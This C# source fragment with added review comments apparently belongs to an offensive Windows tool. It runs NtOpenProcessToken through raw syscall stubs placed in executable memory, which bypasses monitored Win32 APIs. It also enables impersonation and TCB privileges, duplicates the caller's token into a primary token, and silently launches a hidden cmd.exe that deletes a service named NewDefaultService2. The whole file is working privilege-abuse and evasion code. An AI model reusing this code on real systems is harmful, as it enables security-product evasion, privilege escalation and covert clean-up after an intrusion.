// Code from https://www.pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
/// <summary>
/// Reports whether the current process token runs at high (or higher) mandatory integrity level.
/// The token is opened through a direct NtOpenProcessToken syscall stub obtained from
/// <paramref name="syscall"/> instead of the Win32 OpenProcessToken API; the integrity SID
/// is then read with GetTokenInformation(TokenIntegrityLevel) and its last sub-authority
/// (the integrity RID) is compared against SECURITY_MANDATORY_HIGH_RID.
/// </summary>
/// <param name="syscall">Provider of the stub bytes for "NtOpenProcessToken".</param>
/// <returns>
/// true when the integrity RID is >= SECURITY_MANDATORY_HIGH_RID; false when the syscall
/// returns a non-zero NTSTATUS or GetTokenInformation fails.
/// </returns>
public static bool IsHighIntegrity(SyscallManager syscall)
{
    // NOTE(review): despite the name this is the process *handle*, not a process id.
    IntPtr pId = (Process.GetCurrentProcess().Handle);
    IntPtr hToken = IntPtr.Zero;
    IntPtr baseAddr = IntPtr.Zero; // unused
    byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken");
    // Stage the stub in a freshly committed read/write/execute region and call it through a delegate.
    // NOTE(review): the region is never released (no VirtualFree), so every call leaks it.
    var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
    Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
    var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
    IntPtr token = IntPtr.Zero;
    // DynamicInvoke writes the out token back into arguments[2]; the local `token` stays zero.
    var arguments = new object[] { pId, TokenAccessFlags.TOKEN_QUERY, token };
    var returnValue = syscallDelegate.DynamicInvoke(arguments);
    // The stub returns an NTSTATUS; 0 is STATUS_SUCCESS.
    if ((int)returnValue == 0)
    {
        try
        {
            hToken = (IntPtr)arguments[2];
            // Fixed 1000-byte scratch buffer for the mandatory-label structure; the required
            // size is not re-queried, so a larger result would simply make the call fail.
            IntPtr pb = Marshal.AllocCoTaskMem(1000);
            try
            {
                uint cb = 1000;
                if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
                {
                    // The first pointer in the buffer is the label SID; the integrity level
                    // is its last sub-authority (count - 1).
                    IntPtr pSid = Marshal.ReadIntPtr(pb);
                    int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
                    return(dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID ? true : false);
                }
            }
            finally
            {
                Marshal.FreeCoTaskMem(pb);
            }
        }
        finally
        {
            CloseHandle(hToken);
        }
    }
    // Reached when the syscall failed or GetTokenInformation returned false.
    return(false);
}
/// <summary>
/// Creates a manager bound to the given syscall provider and resets the Token/Method
/// state (no token, method 0) that other members read via TokenManager.Token / TokenManager.Method.
/// </summary>
/// <param name="syscall">Syscall stub provider kept for later use by this instance.</param>
public TokenManager(SyscallManager syscall)
{
    this.syscall = syscall;
    Method = 0;
    Token = IntPtr.Zero;
}
/// <summary>
/// Enables a set of privileges on the current process token, duplicates the calling
/// identity's token into a primary token, and launches a fixed cmd.exe command line under it,
/// first via CreateProcessAsUserW and, if that fails, via CreateProcessWithTokenW. On success the
/// duplicated token and the method that worked (1 or 2) are stored in TokenManager.Token /
/// TokenManager.Method. Any exception is swallowed.
/// </summary>
public void Start()
{
    // NOTE(review): this local shadows the `syscall` field assigned in the constructor; the
    // instance's provider is never used here.
    SyscallManager syscall = new SyscallManager();
    try
    {
        // Token of whatever identity the calling thread currently holds; this is the token
        // that gets duplicated below, not the process token opened via the syscall.
        IntPtr token = WindowsIdentity.GetCurrent().Token;
        List <string> aPrivs = new List <string>();
        aPrivs.Add("SeImpersonatePrivilege");
        aPrivs.Add("SeTcbPrivilege");
        aPrivs.Add("SeAssignPrimaryTokenPrivilege");
        aPrivs.Add("SeIncreaseQuotaPrivilege");
        IntPtr currentToken;
        IntPtr baseAddr = IntPtr.Zero; // unused
        byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken");
        // Stage the NtOpenProcessToken stub in a read/write/execute region and call it through a delegate.
        // NOTE(review): the region is never released (no VirtualFree).
        var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
        Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
        var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
        IntPtr t = IntPtr.Zero;
        // DynamicInvoke writes the out token back into arguments[2]; `t` itself stays zero.
        var arguments = new object[] { Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, t };
        var returnValue = syscallDelegate.DynamicInvoke(arguments);
        // NOTE(review): returnValue (an NTSTATUS) is never checked, so a failed open still
        // reaches enablePrivileges with a zero handle.
        currentToken = (IntPtr)arguments[2];
        enablePrivileges(currentToken, aPrivs);
        CloseHandle(currentToken);
        TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY | TokenAccessFlags.TOKEN_DUPLICATE | TokenAccessFlags.TOKEN_ADJUST_DEFAULT | TokenAccessFlags.TOKEN_ADJUST_SESSIONID;
        IntPtr newToken = IntPtr.Zero;
        // Duplicate into a primary token so it can be handed to a new process.
        if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
        {
            return;
        }
        STARTUPINFO startupInfo = new STARTUPINFO();
        startupInfo.cb = Marshal.SizeOf(startupInfo);
        startupInfo.lpDesktop = "";
        // wShowWindow = 0 with flag 0x1 (STARTF_USESHOWWINDOW) starts the child hidden.
        startupInfo.wShowWindow = 0;
        startupInfo.dwFlags |= 0x00000001;
        PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
        // Default (zero) logon flags for the CreateProcessWithTokenW fallback.
        LogonFlags l = new LogonFlags();
        // The command line is a fixed clean-up of a service named NewDefaultService2 —
        // presumably created elsewhere in the project; not visible here.
        // NOTE(review): processInfo's process/thread handles are never closed on either path,
        // and newToken is never closed when both launches fail.
        if (CreateProcessAsUserW(newToken, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
        {
            TokenManager.Token = newToken;
            TokenManager.Method = 1;
        }
        else
        {
            // Fallback for callers that lack SeAssignPrimaryTokenPrivilege for CreateProcessAsUserW — assumed; confirm against the calling context.
            if (CreateProcessWithTokenW(newToken, l, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
            {
                TokenManager.Token = newToken;
                TokenManager.Method = 2;
            }
        }
    }
    // NOTE(review): every exception is swallowed silently; failures leave Token/Method untouched
    // with no diagnostic.
    catch { }
}
/// <summary>
/// Opens the token of the process behind <paramref name="handle"/> with the requested access
/// by invoking a direct NtOpenProcessToken syscall stub (from <paramref name="syscall"/>)
/// rather than the Win32 OpenProcessToken API.
/// </summary>
/// <param name="handle">Process handle whose token is opened.</param>
/// <param name="access">Access mask requested on the token.</param>
/// <param name="currentToken">
/// Receives the token handle the stub wrote back; stays IntPtr.Zero if the stub did not populate it.
/// </param>
/// <param name="syscall">Provider of the stub bytes for "NtOpenProcessToken".</param>
public static void getProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SyscallManager syscall)
{
    IntPtr baseAddr = IntPtr.Zero; // unused
    byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken");
    // Stage the stub in a read/write/execute region and call it through a delegate.
    // NOTE(review): the region is never released (no VirtualFree), so each call leaks it.
    var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
    Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
    var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
    IntPtr token = IntPtr.Zero;
    // DynamicInvoke writes the out token back into arguments[2]; the local `token` stays zero.
    var arguments = new object[] { handle, access, token };
    var returnValue = syscallDelegate.DynamicInvoke(arguments);
    // NOTE(review): returnValue (an NTSTATUS) is discarded, so callers can only detect failure
    // by checking for a zero currentToken.
    currentToken = (IntPtr)arguments[2];
}